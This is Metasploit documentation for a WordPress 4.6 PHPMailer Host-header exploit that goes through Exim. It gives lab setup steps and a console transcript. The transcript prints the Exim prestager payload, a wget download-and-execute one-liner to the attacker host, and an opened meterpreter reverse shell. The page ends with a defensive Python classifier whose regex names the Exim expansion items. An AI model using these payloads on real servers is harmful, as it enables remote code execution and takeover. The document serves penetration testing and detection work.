metasploit-gs/documentation/modules/exploit/unix/webapp/wp_phpmailer_host_header.md

## Introduction
This vuln has some caveats: you need roughly WordPress 4.6, with Exim
providing the `sendmail(8)` command. You do not need to install
PHPMailer separately, as it is bundled with the WordPress install.

Thanks to WP's awesome practice of backporting the heck out of all their
patches, we need to use a Git clone and check out the vulnerable release
rather than a packaged build.

## Setup

This was tested on Ubuntu 15.04. YMMV.

1. got root?
2. `cd /var/www/html`
3. `git clone https://github.com/WordPress/WordPress wordpress-4.6`
4. `chown -R www-data:www-data wordpress-4.6`
5. `cd wordpress-4.6`
6. `git checkout 4.6`
7. Set up a MySQL database for WordPress
8. Install as normal

## Options

**VERBOSE**
If you'd like to see what requests are being sent, set this to `true`.
You should see the Exim prestager commands being sent to the target.

## Usage

```
msf > use exploit/unix/webapp/wp_phpmailer_host_header
msf exploit(wp_phpmailer_host_header) > set rhost 192.168.33.135
rhost => 192.168.33.135
msf exploit(wp_phpmailer_host_header) > set targeturi /wordpress-4.6
targeturi => /wordpress-4.6
msf exploit(wp_phpmailer_host_header) > set lhost 192.168.33.1
lhost => 192.168.33.1
msf exploit(wp_phpmailer_host_header) > set verbose true
verbose => true
msf exploit(wp_phpmailer_host_header) > run
[*] Started HTTPS reverse handler on https://192.168.33.1:8443
[*] WordPress 4.6 installed at http://192.168.33.135/wordpress-4.6
[*] Generating wget command stager
[*] Using URL: http://0.0.0.0:8080/mbpvuuck
[*] Local IP: http://[redacted]:8080/mbpvuuck
[*] Generating and sending Exim prestager
[*] Sending /bin/sh -c ${run{/bin/echo}{${extract{-1}{$value}{${readsocket{inet:192.168.33.1:8080}{get /mbpvuuck http/1.0$value$value}}}}}}
[+] Sending wget${IFS}-qO${IFS}/tmp/vfotastd${IFS}http://192.168.33.1:8080/mbpvuuck;chmod${IFS}+x${IFS}/tmp/vfotastd;/tmp/vfotastd;rm${IFS}-f${IFS}/tmp/vfotastd
[+] Sending payload linux/x64/meterpreter_reverse_https
[*] https://192.168.33.1:8443 handling request from 192.168.33.135; (UUID: xyx88vod) Redirecting stageless connection from /nBwfbdUYNjU2TjBMb1VkagG08CfJO-jZYpOxBsWHQMGHh7p5ISjCG3Ze with UA 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'
[*] https://192.168.33.1:8443 handling request from 192.168.33.135; (UUID: xyx88vod) Attaching orphaned/stageless session...
[*] Meterpreter session 1 opened (192.168.33.1:8443 -> 192.168.33.135:36075) at 2017-05-16 14:25:28 -0500
[*] Sending /bin/rm -f /tmp/vfotastd
[*] Server stopped.
meterpreter >
```
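The transcript above shows what the Exim prestager looks like on the wire. From the defender's side, the same strings are easy to spot in the `Host` header, since no browser ever sends `${run{...}}` or `${IFS}` as a hostname. The following is an added example, not part of the module or of Metasploit, that classifies a raw `Host` header value for a WAF rule or log review; the operator list and sample values are constructed here.

```python
import ipaddress
import re

# Added defensive example, not Metasploit code: classify a raw Host header so a
# WAF rule or log review can flag the Exim string-expansion payloads shown in
# the module transcript, which arrive via the Host header and are expanded by
# Exim's sendmail interface. Sample values in the test are constructed.

_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_HOSTNAME_RE = re.compile(rf"^{_LABEL}(?:\.{_LABEL})*$")
_HOST_PORT_RE = re.compile(r"^(\[[0-9A-Fa-f:.]+\]|[^:\[\]]+)(?::(\d{1,5}))?$")
# Exim expansion items seen in the transcript (run, extract, readsocket) plus
# other Exim items, and shell's ${IFS}, used there to avoid literal spaces.
_EXPANSION_RE = re.compile(
    r"\$\{\s*(?:run|extract|readsocket|substr|lookup|perl|dlfunc|IFS)\b"
)

def _valid_host(value: str) -> bool:
    """True for an RFC 1123 hostname, IPv4, or [IPv6] literal, optional :port."""
    m = _HOST_PORT_RE.match(value)
    if not m:
        return False
    host, port = m.group(1), m.group(2)
    if port is not None and int(port) > 65535:
        return False
    if host.startswith("["):
        try:
            ipaddress.IPv6Address(host[1:-1])
            return True
        except ValueError:
            return False
    return len(host) <= 253 and _HOSTNAME_RE.match(host) is not None

def classify_host_header(value: str) -> str:
    """Return 'injection', 'malformed' or 'ok' for a raw Host header value."""
    if _EXPANSION_RE.search(value):
        return "injection"       # expansion syntax: block and alert
    if not _valid_host(value):
        return "malformed"       # not a hostname a browser would send
    return "ok"

def flagged_hosts(headers):
    """Return (value, verdict) pairs for every Host header that is not 'ok'."""
    return [(h, v) for h in headers
            if (v := classify_host_header(h)) != "ok"]
```

Feeding the `Host` values from a web server access log through `flagged_hosts` separates noisy but harmless malformed hosts from the expansion payloads worth an alert.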